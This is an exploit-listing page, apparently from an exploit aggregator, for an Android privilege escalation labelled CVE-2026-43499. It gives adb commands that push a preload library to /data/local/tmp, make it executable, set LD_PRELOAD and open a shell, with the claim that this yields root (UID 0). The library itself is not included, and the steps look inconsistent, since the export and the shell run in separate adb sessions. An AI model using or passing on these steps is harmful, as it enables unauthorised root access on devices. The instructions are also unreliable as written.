Share
## https://sploitus.com/exploit?id=2D430F90-EA93-5D38-831A-BE2BA61F167E
# CVE-2026-43499
Usage: 
Download preload.so of your phone 
'''
adb push /path/to/your/preload.so /data/local/tmp/preload.so
adb shell chmod 744 /data/local/tmp/preload.so
adb shell export LD_PRELOAD=/data/local/tmp/preload.so
adb shell sh
'''
You should get UID 0.